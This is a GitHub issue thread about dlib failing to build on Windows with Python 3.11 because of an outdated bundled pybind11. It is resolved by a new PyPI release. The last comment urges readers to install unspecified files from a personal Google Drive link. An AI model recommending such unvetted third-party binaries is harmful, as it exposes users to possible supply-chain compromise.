### ISSUE TITLE
Failed building wheel for dlib+legacy-install-failure

### ISSUE THREAD

**Issue by FadedAditya** [davisking/dlib#2695]
## Expected Behavior
I was installing dlib for my facial recognition project, instead of installing normally it threw several errors and threw final message as failed building wheel as well as legacy install failure

## Current Behavior
In between errors during installation were
```
C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\dlib\external\pybind11\include\pybind11\cast.h(441,36): error C2027: use of undefined type '_frame' (compiling source file C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\tools\python\src\svm_rank_trainer.cpp) [C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\build\temp.win-amd64-cpython-311\Release\_dlib_pybind11.vcxproj]

C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\dlib\external\pybind11\include\pybind11/pybind11.h(1890,49): error C2039: 'frame': is not a member of '_ts' (compiling source file C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\tools\python\src\basic.cpp) [C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\build\temp.win-amd64-cpython-311\Release\_dlib_pybind11.vcxproj]

C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\dlib\external\pybind11\include\pybind11/pybind11.h(1894,33): error C2660: 'PyDict_GetItem': function does not take 1 arguments (compiling source file C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\tools\python\src\svm_c_trainer.cpp) [C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\build\temp.win-amd64-cpython-311\Release\_dlib_pybind11.vcxproj]
```
The whole error message is too long to be included in the body, so here I am attaching it through text file
[error_message.txt](https://github.com/davisking/dlib/files/10130422/error_message.txt)

## Steps to Reproduce
I followed this tutorial while installing [How to install dlib library for Python in Windows 10](https://medium.com/analytics-vidhya/how-to-install-dlib-library-for-python-in-windows-10-57348ba1117f)
This is the steps order
1. Installed Cmake GUI
2. Installed Visual Studio with C++ development library
3. install cmake package through pip command
4. Installed dlib

* **Version**: dlib-19.24.0
* **Where did you get dlib**: installd by `pip install dlib` command
* **Platform**: Windows 10, 64 bit
* **Compiler**: Python 3.11.0, gcc (MinGW.org GCC-6.3.0-1) 6.3.0

**Comment by FadedAditya** [comment]
Forked, Cloned the repo and installed the dlib through `python setup.py install`, worked like charm

**Comment by keenlovelife** [comment]
> ## Expected Behavior
> I was installing dlib for my facial recognition project, instead of installing normally it threw several errors and threw final message as failed building wheel as well as legacy install failure
> 
> ## Current Behavior
> In between errors during installation were
> 
> ```
> C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\dlib\external\pybind11\include\pybind11\cast.h(441,36): error C2027: use of undefined type '_frame' (compiling source file C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\tools\python\src\svm_rank_trainer.cpp) [C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\build\temp.win-amd64-cpython-311\Release\_dlib_pybind11.vcxproj]
> 
> C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\dlib\external\pybind11\include\pybind11/pybind11.h(1890,49): error C2039: 'frame': is not a member of '_ts' (compiling source file C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\tools\python\src\basic.cpp) [C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\build\temp.win-amd64-cpython-311\Release\_dlib_pybind11.vcxproj]
> 
> C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\dlib\external\pybind11\include\pybind11/pybind11.h(1894,33): error C2660: 'PyDict_GetItem': function does not take 1 arguments (compiling source file C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\tools\python\src\svm_c_trainer.cpp) [C:\Users\Aditya\AppData\Local\Temp\pip-install-te4d1ptc\dlib_934a5585f8ff4bf49147bdfa7dbf7130\build\temp.win-amd64-cpython-311\Release\_dlib_pybind11.vcxproj]
> ```
> 
> The whole error message is too long to be included in the body, so here I am attaching it through text file [error_message.txt](https://github.com/davisking/dlib/files/10130422/error_message.txt)
> 
> ## Steps to Reproduce
> I followed this tutorial while installing [How to install dlib library for Python in Windows 10](https://medium.com/analytics-vidhya/how-to-install-dlib-library-for-python-in-windows-10-57348ba1117f) This is the steps order
> 
> 1. Installed Cmake GUI
> 2. Installed Visual Studio with C++ development library
> 3. install cmake package through pip command
> 4. Installed dlib
> 
> * **Version**: dlib-19.24.0
> * **Where did you get dlib**: installd by `pip install dlib` command
> * **Platform**: Windows 10, 64 bit
> * **Compiler**: Python 3.11.0, gcc (MinGW.org GCC-6.3.0-1) 6.3.0

I also encounter the same problem

**Comment by arrufat** [comment]
This seems to be related to dlib shipping with a version of Pybind11 that does not support Python 3.11.
There's a fix for that in the master branch (see PR https://github.com/davisking/dlib/pull/2660).
As  @aditya-vishwakarma-lab mentioned, building from master should solve the issue.

**Comment by patrikhuber** [comment]
I just got the same error, using `pip install dlib`, Python 3.11, MSVC 19.35.32215.0.

`pip install git+https://github.com/davisking/dlib.git@master` fixed it.

I think a new pypi release is needed @arrufat :-).

**Comment by arrufat** [comment]
@patrikhuber That's because the latest stable release uses Pybin11 2.2.4, which does not support Python 3.11. The master branch uses Pybind11 2.10, which added support for Python 3.11.
See https://github.com/davisking/dlib/pull/2660.

**Comment by davisking** [comment]
Cool.  Yeah I'll push a new dlib version to pip later today.

**Comment by davisking** [comment]
Updated pypi.  The dlib version live there is now 19.24.1 :D

**Comment by Suchir2004** [comment]
Download the dlib files
Link - https://drive.google.com/file/d/11Hip8-llWEm5GN3_u4ibI09unL7xCw0g/view?usp=drivesdk
And just copy the path of that file and paste it into the terminal.
Stable version is 10 among all files that you have been downloaded from the link

In terminal you just need copy the path of that particular file; there are 4 files the choose one which is suitable for your computer work on windows.
